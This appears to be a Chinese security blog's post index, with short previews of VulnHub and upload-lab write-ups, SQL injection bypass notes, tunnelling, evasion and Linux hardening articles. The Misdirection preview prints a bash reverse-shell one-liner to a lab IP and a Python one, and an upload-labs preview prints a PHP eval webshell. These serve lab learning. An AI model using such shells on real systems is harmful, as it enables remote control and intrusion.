- 博客(99)
- 收藏
- 关注
RSS订阅原创 Misdirection(VulnHub)
Misdirectionnmap扫描目录爆破80小探索searchsploit无果8080端口渗透反弹shellbash -i >& /dev/tcp/192.168.2.228/11111 0>&1python -c 'import socket,subprocess,os;s=socket.socket(socket.AF...
2024-02-03 23:51:00
366
原创 Upload-labs
Upload-labsUpload-labs_Pass-01-->绕过前端校验法一:关闭浏览器js的功能法二:通过先上传合法的文件后缀,在通过抓包进行文件后缀修改function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null ...
2024-01-30 00:41:00
860
原创 pikachu通关教程(暴力破解)
pikachu通关教程(暴力破解)①基于表单的暴力破解不用多说,直接常见用户、弱口令爆破即可。账号:admin 密码:123456账号:test 密码:test②验证码绕过(on client)提交请求,没有抓到包,说明验证码是前端校验,只要保证能过前端,后面的验证码将不进行校验(把验证码删掉都可)。前端校验绕过前端,当我们输入一次正常的验证码即可绕过设置爆破参数成...
2024-01-28 09:21:00
388
原创 文件包含漏洞
文件包含漏洞文件包含漏洞简介文件包含漏洞基础介绍文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。文件包含漏洞常见函数PHP当中有:include()、include_o...
2024-01-27 12:33:00
1027
原创 upload-labs-main-v1.0
upload-labs-main-v1.0Pass-01【前端校验】解题wp (By:独立团孙德胜Alan)本Pass是客户端过滤,可以通过禁用JS的方式绕过!1、打开第一关2、上传一个普通的shell.php文件<?php @eval($_POST('Alan'));?>提示不允许上传3、分析代码发现是前端JS校验4、前端js验证的绕过对于前端js...
2024-01-26 09:46:00
817
原创 文件上传漏洞
文件上传漏洞文件上传漏洞简介文件上传漏洞出现在有上传功能的应用程序中。如果应用程序对用户的上传文件没有控制或者上传功能存在缺陷,攻击者可以利用应用程序的文件上传漏洞将木马,病毒等有危害的文件上传到服务器上面,控制服务器。文件上传漏洞产生的主要原因是:应用程序中存在上传功能,但是对上传的文件没有经过严格的合法性检验或者检验函数存在缺陷,导致攻击者可以上传木马文件到服务器。文件上传漏洞危害极...
2024-01-25 10:11:00
938
原创 sqlmap使用教程
SQLMAP是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多强大的功能,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。
2024-01-19 22:46:59
705
1
原创 Google Hacking语法总结
Google Hacking是利用谷歌搜索的强大,来在浩瀚的互联网中搜索到我们需要的信息。轻量级的搜索可以搜素出一些遗留后门,不想被发现的后台入口,中量级的搜索出一些用户信息泄露,源代码泄露,未授权访问等等,重量级的则可能是mdb文件下载,CMS未被锁定install页面,网站配置密码,php远程文件包含漏洞等重要信息。基本搜索:逻辑与:and逻辑或:or逻辑非:–完整匹配:“关键词”通配符:*?
2024-01-17 22:50:32
2127
原创 常见sql注入绕过方法
常见sql注入绕过方法目录常见sql注入绕过方法1、空格过滤绕过漏洞代码示例/**/绕过制表符绕过换行符绕过括号绕过`反引号绕过2、内联注释绕过【常见waf!!!】3、大小写绕过4、双写关键字绕过5、编码绕过漏洞示例代码双重URL编码绕过十六进制编码绕过Unicode编码绕过ASCII编码绕过6、等价函数字符替换绕过漏洞示例代码用like或in代替=逗号过滤等价函数7、逻辑符号替换8、宽字节绕...
2024-01-17 22:45:00
3636
原创 Redteam.lab_Writeup
CVE-2019-5736 是 runC 的 CVE 漏洞编号,runC 最初是作为 Docker 的一部分开发的,后来作为一个单独的开源工具和库被提取出来,在 docker 整个架构的运行过程中,Containerd 向 docker 提供运行容器的 API,二者通过 grpc 进行交互。因为这里socks模块只是将代理设置为监听的端口(默认是1080),即通过proxychains的流量都转给本地的1080端口,又因为这是MSF起的监听端口,所以通过代理走的流量也都能到达内网。
2024-01-15 14:00:08
944
原创 CewlKid(VulnHub)_Writeup
这是因为它通常被认为是一个共享的、可写的目录,任何用户都可以在其中创建临时文件,而不需要担心权限问题。尝试使用cewl,可以给他的爬虫指定URL地址和爬取深度,还可以添加外部链接,接下来Cewl会给你返回一个字典文件。sudo -l 命令用于列出当前用户可以使用 sudo 命令执行哪些命令以及这些命令的权限级别。不过这似乎要登入进去才可以进行文件上传,现阶段这有点难顶!换一个密码,再抓包发现Token值不变,那么,尝试爆破密码。查看8080端口,发现有Login,我们点击进去看看。
2024-01-15 13:22:32
1917
原创 IMF_1(VulbHub)_WriteUp
为了防止缓冲区溢出这种情况的出现,在C库函数中,许多对字符串操作的函数都有其"n兄弟"版本,例如strncmp,strncat,snprintf……strncmp("dwqdq\n", "48093572", 8) = -1 ----正在将我提供的字符串与字符串48093572进行比较,在这种情况下导致=-1)nmap 192.168.126.167 -p7788,80 ----这时候7788端口开启!这边肯定好奇了,这儿为什么上传gif,但是可以执行php的命令,这部分的内容我们后边再说。
2024-01-15 10:57:30
995
原创 渗透测试 | 信息收集常用方法总结
渗透测试 | 信息收集常用方法总结简述几乎每一个学习渗透的安全人员,都会被告知,信息收集是渗透测试的本质,那事实果真如此嘛?答案是,是的!信息收集作为渗透测试的前期主要工作,说白了叫做确定目标,以达到制作渗透计划的目的,这是非常重要的,甚至有的时候,仅仅通过信息收集,就可以拿到目标的shell了。其实信息收集也是有分类的:分为主动信息收集+被动信息收集。主动信息收集,说白了,就是直接访问、...
2024-01-15 09:50:00
910
原创 如何在 Ubuntu 20.04 上安装 Java且实现版本切换
如何在 Ubuntu 20.04 上安装 Java且实现版本切换在这个指南中,我们将会描述如何在 Ubuntu 20.04 上安装 Java。Java 是世界上最流行的编程语言之一,被用来构建各种不同的应用和系统。Java 运行在所有的主流操作系统和设备上。你可以在你的笔记本,电话和游戏中发现使用 Java 开发的应用。一、开始之前有很多不同的 Java 实现。OpenJDK 和 Ora...
2024-01-11 23:15:00
1173
原创 如何在 Ubuntu 22.04 LTS 中安装 Docker 和 Docker Compose
如何在 Ubuntu 22.04 LTS 中安装 Docker 和 Docker Compose在 Ubuntu 中使用 Docker Compose 安装 Docker 引擎的分步指导。Docker 依赖项为了安装并配置 Docker ,你的系统必须满足下列最低要求:64 位 Linux 或 Windows 系统如果使用 Linux ,内核版本必须不低于 3.10能够使用s...
2024-01-01 19:24:00
2843
原创 初识SQL注入
初识SQL注入↗1、SQL注入原理SQL注入漏洞是指攻击者通过浏览器或者其他客户端将恶意SQL语句插入到网站参数中,而网站应用程序未对其进行过滤,将恶意SQL语句带入数据库使恶意SQL语句得以执行,从而使攻击者通过数据库获取敏感信息或者执行其他恶意操作。2、SQL注入危害➢ 绕过登录验证:使用万能密码登录网站后台等。 如:'or 1=1#➢ 获取敏感数据:获取网站管理员帐号、密码等。...
2023-12-21 23:39:00
833
原创 渗透测试常用术语总结
渗透测试常用术语总结题记人的一生会遇到两个人,一个惊艳了时光,一个温柔了岁月。——苏剧《经年》正文我是会把我遇到很晦涩或者难以理解的词语分享到这的。相信大家和我一样,搞不清这些专业名词的区别,所以我来整理一下。1. POC、EXP、Payload与ShellcodePOC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。EXP:全...
2023-12-20 13:20:00
1211
原创 frp二层代理实验
frp二层代理实验环境说明拓扑介绍公网服务器:广州内网主机kali、Windows:福州(如果是虚拟机实验的话,设置仅主机网卡时注意要取消勾选【仅主机模式(在专用网络内连接虚拟机)(H)】这个选项哦,否则效果不是很明显)实现第一层代理 (反向代理)目标:kali的流量转发到服务器上公网服务器:内网kali(能出网):物理机设置走公网服务器的代理测试:实现kali的...
2023-12-10 09:42:00
461
原创 frp隧道的基础使用
frp隧道的基础使用针对端口进行映射【内网穿透】frps[common]bind_port = 7000# 监听的端口token = Aa@123.# 密钥dashboard_port = 7001# dashboardb端口dashboard_user = carmi# dashboard帐号dashboard_pwd = carmi@123# dashboard密码...
2023-12-02 00:02:00
415
原创 SRC漏洞挖掘的一点小引导
SRC漏洞挖掘第一阶段:具有python等编程基础菜鸟教程学习语法:https://www.runoob.com/python/python-tutorial.htmlPython编程基础:https://www.icourse163.org/course/NKU-1205696807第二阶段:掌握常见漏洞原理与利用技巧关于常见漏洞原理与利用技巧学习可以根据以下三个阶段去学习,至...
2023-11-22 13:00:00
1090
原创 IMF_1(VulbHub)
IMF_1(VulbHub)_WriteUp目录IMF_1(VulbHub)_WriteUp1、主机探测2、web渗透发现flag1发现flag2拼接imfadministrator目录收集用户名代码审计之弱类型绕过发现flag3进入IMF CMS漏扫测试尝试跑sqlmap发现异常数据发现flag4继续访问uploadr942.php页面waf绕过(.htaccess绕过)发现flag5反弹s...
2023-11-14 00:57:00
123
原创 LordOfTheRoot_1.0.1(VulnHub)
LordOfTheRoot_1.0.1_Writeup目录LordOfTheRoot_1.0.1_Writeup1、主机存活探测2、尝试仅仅开放了22端口3、由提升进行端口碰撞4、敲震三次后进行全端口扫描5、信息枚举不摸所F12调试界面跑目录跑不出来,只能手测base双重解码后发现新东西6、发现目录7、SQLmap注入8、通过数据库账号密码登入9、尝试爆破10、SSH登录11、EXP内核提权查...
2023-11-13 09:08:00
142
原创 W1R3S(VulnHub)
这是一个精简版的靶场通关教程,仅供记录使用。渗透步骤信息收集1.存活主机发现⒉端口扫描3.FTP服务器渗透4.分析目标文件web渗透1.目录爆破⒉尝试安装漏洞3.识别cms搜索漏洞4.文件包含漏洞读取任意文件5.john破解密码文件...
2023-11-11 19:41:00
28
原创 18、IPTABLES
IPTABLES目录IPTABLES1、防火墙介绍2、数据传输3、iptables前提-->路由小实验4、iptables介绍5、iptables原理1.五条链2.五个表3.表中链(重要)4.链属表5.四表规则6、补充6、iptables实验7、防火墙的备份与还原8、内、外网之间的需求访问网络设备:交换机、路由器(网络层或者链路层)安全设备:不直接参与数据的传输、连通性,主要用于保护网...
2023-11-03 00:08:00
116
原创 17、Linux应急响应
Linux应急响应目录Linux应急响应1、入侵排查思路2、操作步骤1、账户安全2、历史命令3、检查异常端口、进程4、检查开机启动项5、入侵排查6、查询已安装的服务7、检查异常文件8、日志分析技巧9、病毒查杀1、入侵排查思路账号安全 -> 历史命令 -> 检查异常端口 -> 检查异常进程 -> 检查开机启动项 -> 检查定时任务 -> 检查服务 ->...
2023-11-02 00:31:00
63
原创 16、Linux安全加固
Linux安全加固目录Linux安全加固1、账号和口令2、服务、端口3、文件系统4、日志5、内核漏洞6、其他7、等保测评Linux测评命令安全加固思路账户安全 -> 密码策略 -> 当前开放的服务是否存在高危服务 -> 排查当前的系统中是否存在内核漏洞 -> 排查主机所在信息系统所对应的管理制度是否恰当。所有修改均需要root账号下,修改前务必先备份,备份命名建议使...
2023-11-01 19:21:00
25
原创 Linux反弹shell
简介LInux反弹Shell(Reveser Shell), 也可以称为反向Shell, 由被控制端主动向控制端发送请求建立通讯, 随后将执行命令的结果输出到控制端, 本质上是网络概念的客户端与服务端的角色反转本篇文章介绍LINUX反弹Shell的多种姿势, 在真实的渗透环境中, 根据客户端存在哪些命令的实际情况, 来采取相应的反弹shell姿势实验环境操作系统IP地址...
2023-10-31 08:51:00
43
原创 15、Linux日志审计
Linux日志审计目录Linux日志审计1、日志文件的功能和分类2、日志文件保存位置和文件介绍3、管理日志服务的配置文件4、内核及系统日志5、日志消息的级别6、日志记录的一般格式7、用户日志分析8、程序日志分析9、日志服务器搭建10、补充1、日志文件的功能和分类日志的功能用于记录系统、程序运行中发生的各种事件。通过阅读日志,有助于诊断和解决系统故障日志。文件的分类1、内核及系统日志:...
2023-10-30 23:26:00
315
原创 内网渗透-免杀
内网渗透-免杀全文内容来自网络,如有冒犯立删。目录内网渗透-免杀杀软原理静态检测动态检测流量检测云查杀免杀原理静态免杀修改特征码花指令免杀加壳免杀动态免杀API免杀内存免杀二次编译分离免杀资源修改免杀技术研究Bypass一览表(2020年)Bypass一览表(2022年)复现环境(2022年)Metasploit自带免杀原生态payload(VT查杀率51/69)msf自编码免杀(VT查...
2023-10-25 23:41:00
169
原创 14、Linux服务器搭建
Linux服务器搭建目录Linux服务器搭建【本地源的搭建】【DHCP服务器搭建】【ftp服务器搭建】【DNS服务器搭建】【本地源的搭建】【本地源的搭建】--本地服务器搭建的前提①查看本地源仓库//查看本地源仓库[root@localhost ~]# cd /etc/yum.repos.d/[root@localhost yum.repos.d]# lltotal 40-rw-r...
2023-10-23 20:36:00
41
原创 13、Linux文本三剑客
Linux文本三剑客目录Linux文本三剑客一、grep命令二、sed命令三、awk命令都要最基本的功能--查看以列为单位查看的话awk命令更快;以行为单位查看的话sed命令更好;查看某个字段以grep更方便。一、grep命令Linux grep命令用于查找文件里符合条件的字符串。grep指令用于查找内容包含指定的范本样式的文件,如果发现某文件的内容符合所指定的范本样式,预设grep指令...
2023-10-22 08:41:00
23
原创 12、Linux中shell脚本
Linux中shell脚本目录Linux中shell脚本一、基础知识1、第一个shell脚本程序2、shell变量定义3、shell变量的赋值、修改、删除4、shell特殊变量二、脚本使用1、静态IP修改-交互式脚本2、主机存活探测-if脚本3、主机存活探测-for脚本4、主机存活探测-while脚本5、纯净查杀-case脚本三、其他1、shell和shell脚本的区别2、/bin/sh与/b...
2023-10-21 10:47:00
35
原创 11、Linux文件与目录权限
Linux文件与目录权限目录Linux文件与目录权限一、Linux 文件基本属性1、文件介绍2、Linux文件属主和属组二、更改文件属性1、chmod命令2、chown命令3、chgrp命令4、chattr命令5、lsattr命令三、其他1、权限掩码2、特殊权限①SBIT(粘滞位)②SUID(属主特殊权限)③SGID(属组特殊权限)3、find命令4、管道命令符使用5、Linux中颜色的含义所...
2023-10-20 09:01:00
49
原创 10、Linux用户和组
Linux用户和组Windows当中guest用户为内置用户,用户组当中是否复杂。且不同的组都有不同的(独有的)权限。Linux当中用户十分纯粹。一、基本概念1、基本介绍Linux作为一种多用户的操作系统(服务器系统),允许多个用户同时登陆到系统上,并响应每个用户的请求。任何需要使用操作系统的用户,都需要一个系统账号,账号分为:管理员账号与普通用户账号。在Linux中,操作系统根据UID...
2023-10-17 21:19:00
43
原创 9、Linux中的基础命令
Linux中的基础命令1、Linux系统命令行提示符介绍[root@Lin ~]# ①root——用户名 (默认是登录自己创建的普通用户)②Lin——主机名/计算机名 初始为:localhost③~——所在位置(绝对路径为/home/lin) ~:家目录 /:根目录(根目录是所有文件开始的地方)④#——权限 #:root权限 $:普通权限=======...
2023-10-14 14:24:00
58
原创 8、Windows安全加固
Windows安全加固1、账户账户-默认账户安全①禁用Guest账户(禁用默认账户)。②禁用或删除其他账户(建议先禁用账户—段时间,待确认没有问题后删除)。③设定不同的用户和用户组。例如,管理员用户、数据库用户、审计用户、来宾用户等。说明:1.管理员用户:能够维护正常应用进程的管理员,不是超级管理员2.数据库用户(安全管理员):身份认证3.审计用户(审计管理员):查看日志4....
2023-10-07 23:33:00
140
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人